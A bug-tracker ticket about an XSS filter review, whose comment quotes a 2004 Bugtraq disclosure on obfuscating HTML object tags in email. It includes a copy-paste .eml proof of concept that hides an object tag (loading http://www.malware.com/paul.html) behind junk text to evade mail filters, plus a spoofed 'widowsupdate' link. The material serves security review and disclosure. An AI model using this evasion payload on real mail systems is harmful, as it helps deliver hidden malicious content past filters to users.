Tickets :: Comment on [#388] XSS filter review

* Your Email Address
* Spam protection	Enter the letters below: \ /. . ..__ .__. >< \| \|__\|\| \\| \| / \\|___\| \|\|__/\|__\
Comment	> I haven't read this in depth yet, but might be worth another HTML MIME > > viewer review. > > > > ----- Weitergeleitete Nachricht von james.slora@phra.com ----- > > Datum: Tue, 13 Jul 2004 15:30:08 -0400 > > Von: "James C. Slora, Jr." <james.slora@phra.com> > > Antwort an: "James C. Slora, Jr." <james.slora@phra.com> > > Betreff: Find the tag continued > > An: bugtraq@securityfocus.com, Windows NTBugtraq Mailing List > > <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM> > > > > Takeoff from http-equiv's notes about closing > > > > > By design, unprocessable HTML tags and tag parameters are ignored during > > parsing. An amazing amount of worthless obfuscating stuff can be > > inserted before the closing > of a valid tag, and the parameters for the > > tag can be tough to find. > > > > Mail filtering and human review of unwanted stuff like object and iframe > > tags might get fooled. > > > > Here is a funnier example of tag obfuscation, plus an odd interactive > > rendering of the message. It uses http-equiv's Paul.html for its object > > data source. Paste the stuff below into a text file named message.eml > > and open it in Outlook Express. Forward it to Outlook for more of the > > same fun. Add alternate text for non-html readers, and it could be even > > more funny. Mix in some auto-execute silliness to taste. It will already > > execute if forwarding while using Word as the email editor. > > > > ---> Copy everything below this line <--- > > Content-Type: text/html; > > > > As part of ongoing security efforts, Big Internet Software Company is > > conducting a gullibility test. Forward this to all your friends to see > > if they click the link. You will receive twenty dollars from them for > > every friend you can fool.<br> <br>This message will now check for your > > software's compatibility with this > > test.<hemo><poisoning><spamsux><hidden><bury> <object << <img << <html > > <<< </body </html > > > > Enlarge your nostrils - she will thank you for it. This is a dull > > message designed to distract you from the tag completion down below if > > you are a mail administrator who is looking at the source of a spam > > message to see if there is anything fishy in it, or if you are a mail > > screening program that wants to look for the closing of the object tag > > but is only willing to look so far to avoid munching all the CPU time > > that is available searching for closing tags. > > > > > > You can ramble on and on and on yet still remain within the object tag > > until you finally come to an > closing element. I wonder what the > > limit might be? > > > > Object just goes and goes and goes. You could probably put an > > encyclopedia in here. > > > > **************************** > > Such ridiculous lengths made me wonder if eventually you must overflow a > > buffer. But 48MB worth of garbage did not cause any problems - it just > > took longer to display. > > ************************** > > > > Insert additional garbage here ad nauseum. > > > > > > > > If you do not wish to receive similar messages in the future, please > > send a blank message to > > mailto:nostrilenlargement@stickyourfingerinit.com, or use this > > unsubscribe link: data=3D"http://www.malware.com/paul.html" > > <a HREF="www.widowsupdate.comm"> > > > > <br><br> > > *****SORRY********* > > <br><br> > > > > Your mail client does not support the ActiveX control required to > > participate in this test. You may still collect twenty dollars for each > > of your friends that clicks.<br><br> > > > > If you do not wish to participate in future tests, <br>please send a > > blank message to <br>mailto:nostrilenlargement@stickyourfingerinit.comm, > > <br>or use this unsubscribe link: > > "http://www.pickledherring.orgg/page.php" > > > > ----- Ende der weitergeleiteten Nachricht -----
Attachment
Watch this ticket

Saved Queries